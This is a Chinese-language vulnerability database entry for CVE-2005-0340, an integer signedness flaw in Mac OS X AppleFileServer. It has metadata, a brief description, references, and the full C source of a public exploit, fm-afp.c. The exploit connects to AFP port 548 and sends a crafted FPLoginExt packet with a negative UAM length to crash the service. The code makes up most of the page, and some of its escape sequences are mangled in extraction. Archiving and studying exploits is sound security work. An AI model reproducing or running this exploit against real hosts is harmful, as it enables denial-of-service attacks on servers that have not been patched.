Apple Mac OS X AppleFileServer 远程整数溢出漏洞

Apple Mac OS X AppleFileServer 远程整数溢出漏洞

漏洞ID 1108445 漏洞类型 边界条件错误
发布时间 2005-02-08 更新时间 2005-10-20
图片[1]-Apple Mac OS X AppleFileServer 远程整数溢出漏洞-安全小百科CVE编号 CVE-2005-0340
图片[2]-Apple Mac OS X AppleFileServer 远程整数溢出漏洞-安全小百科CNNVD-ID CNNVD-200505-472
漏洞平台 OSX CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/799
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-472
|漏洞详情
AppleFileService(AFPServer)中存在整数符号类型错误,允许远程攻击者通过FPLoginExt数据包中负值的UAM字符串长度来引起拒绝服务(应用程序崩溃)攻击。
|漏洞EXP
/* [ fm-afp.c ]
* -( nemo @ felinemenace.org )- 2005
*
* Code for afp bug found by Braden Thomas.
*
* Again hello to everyone @ irc.pulltheplug.org
*
* need a challenge? -( http://pulltheplug.org )-
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define UAMSIZE    1022
#define AFPVERSIZE 5
#define PATHSIZE   30
#define UASIZE     30
#define AFPNSIZE   5
#define AFPPORT    548
#define BUFSIZE sizeof(dsi)+sizeof(fploginext) //+LEN+sizeof(afpEnd)

typedef struct { char AFPVER[AFPVERSIZE]  ;} AFPVER_T;
typedef struct { char UAM[UAMSIZE]        ;} UAM_T;
typedef struct { char PATH[PATHSIZE]      ;} PATH_T;
typedef struct { char UserAuthInfo[UASIZE];} UserAuth_t;
typedef struct { char AFPName[AFPNSIZE]   ;} AFPName_t;

typedef struct dsi { // Data Stream Interface.
       u_int8_t  req;
       u_int8_t  com;
       u_int16_t id;
       u_int32_t offset;
       u_int32_t len;
       u_int32_t reserved;
} DSI_T;

typedef struct FPLoginExt { // Establishes a session with a server using an Open Directory domain.
       u_int8_t   command;
       u_int8_t   pad;
       u_int16_t  flags;
       AFPVER_T   AFPVER;
       UAM_T      UAM;
       u_int8_t   UserNameType;
       AFPName_t  UserName;
       u_int8_t   PathType;
       PATH_T     Pathname;
       u_int8_t   pad2;
       UserAuth_t UserAuthInfo;
} FP_LoginExt_T;

DSI_T dsi;
FP_LoginExt_T fploginext;

void banner()
{
       printf(" [ fm-afp.c ]n");
       printf("-( [email protected] )-nn");
}

void usage(char *progname)
{
       printf("usage: %s <ip address>.n",progname);
       exit(1);
}

int connect_afp(char *ip,int *sockfd)
{
       struct sockaddr_in target_addr;
       int len;

       *sockfd = socket(AF_INET, SOCK_STREAM, 0);

       target_addr.sin_family = AF_INET;
       target_addr.sin_port = htons(AFPPORT);
       inet_aton(ip, &(target_addr.sin_addr));
       memset(&(target_addr.sin_zero), '', 8);

       if (connect(*sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1) {
               return 1;
       }
       return 0;
}

void generate_packet(char *packet)
{
       int n;

       dsi.req       = 'x00';
       dsi.com       = 'x02';
       dsi.id        = (u_int16_t)0x0002;
       dsi.offset    = 0x00000000;
       dsi.len       = 0x00000434;
       dsi.reserved  = 0x00000000;

       fploginext.command = (u_int8_t)'x3f';
       fploginext.pad     = (u_int8_t)'x00';
       fploginext.flags   = (u_int16_t)0x0000;
       memcpy((char *)&(fploginext.AFPVER),"x04x6ex65x6dx6f",5);
       memset((char*)((&fploginext.UAM)),'x70',sizeof(fploginext.UAM));
       fploginext.UAM.UAM[0] = 'x0f';
       fploginext.UAM.UAM[1] = 'xff';
       fploginext.UAM.UAM[257] = 'xff';               //      size of next string.
       fploginext.UAM.UAM[258] = 'xff';               //
       fploginext.UAM.UAM[500] = 'x00';               //      size of next string.
       fploginext.UAM.UAM[501] = 'xf0';               //

       fploginext.UserNameType = (u_int8_t)'x11';
       memcpy((char *)&(fploginext.UserName),"x54x6ex65x6dx6f",5);
       fploginext.PathType = (u_int8_t)'xff';
       memcpy((char *)&(fploginext.Pathname),"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",30);
       fploginext.pad2 = (u_int8_t)'xff';
       memcpy((char *)&(fploginext.UserAuthInfo),"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBB",30);

       memcpy(packet, &dsi, sizeof(dsi));
       packet += sizeof(dsi);
       memcpy(packet, &fploginext, sizeof(fploginext));
}

int send_packet(char *packet,int *sockfd)
{
       if (send(*sockfd, packet, BUFSIZE, 0) == -1) {
               return 1;
       }

       return 0;
}

int main(int ac, char **av)
{
       int sockfd;
       char packet[BUFSIZE];
       struct timeval time;

       banner();
       if(ac != 2) {
               usage(*av);
       }
       printf("[+] Connecting to target: %s.n",av[1]);
       if(connect_afp(av[1],&sockfd)) {
               printf("[-] An error has occured connecting to the target.n");
               exit(1);
       }

       printf("[+] Generating malicious packet.n");
       generate_packet(packet);

       printf("[+] Sending packet to target.n");
       if(send_packet(packet,&sockfd)) {
               printf("[-] Error sending packet.n");
               close(sockfd);
               exit(1);
       }

       fd_set mySet;
       FD_ZERO(&mySet);
       FD_SET(sockfd, &mySet);
       time.tv_sec = 0;
       time.tv_usec = 50;
       select(sockfd+1, &mySet, NULL, NULL, &time);

       close(sockfd);
       return 0;
}

// milw0rm.com [2005-02-08]
|参考资料

来源:APPLE
名称:APPLE-SA-2005-03-21
链接:http://lists.apple.com/archives/security-announce/2005/Mar/msg00000.html
来源:XF
名称:Applefileserver-fploginext-dos(19263)
链接:http://xforce.iss.net/xforce/xfdb/19263
来源:BUGTRAQ
名称:20050208AppleFileServerDenialofService.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110791369419784&w;=2
来源:BID
名称:12478
链接:http://www.securityfocus.com/bid/12478

相关推荐: PHP-Fusion Messages.PHP SQL Injection Vulnerability

PHP-Fusion Messages.PHP SQL Injection Vulnerability 漏洞ID 1096147 漏洞类型 Input Validation Error 发布时间 2005-08-06 更新时间 2005-08-06 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享